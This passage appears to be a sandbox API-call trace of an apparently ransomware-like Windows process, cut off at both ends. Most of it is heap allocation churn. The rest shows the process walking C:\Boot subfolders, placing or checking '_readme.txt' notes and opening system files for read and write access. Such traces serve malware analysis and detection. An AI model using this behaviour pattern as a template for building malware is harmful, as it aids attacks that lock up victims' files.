lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.085] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.085] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.089] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.090] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.090] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.091] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0130.091] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.091] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.091] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.091] PathFindFileNameW (pszPath="") returned="" [0130.091] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.092] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.092] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.092] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.092] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.092] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.092] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.092] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0130.092] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0130.093] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.093] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.093] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.093] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.093] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.093] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0130.093] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.093] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.093] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.093] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned=".txt" [0130.094] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.094] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.094] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.095] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.095] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.095] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.095] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.095] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.095] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.095] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.095] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.095] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.095] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.095] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.095] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0130.095] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.095] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.095] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.095] PathFindFileNameW (pszPath="") returned="" [0130.095] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.095] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.096] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.096] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.096] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.096] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0130.096] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.096] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.096] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0130.097] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.097] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0130.097] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.097] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.097] FindNextFileW (in: hFindFile=0x49a4880, 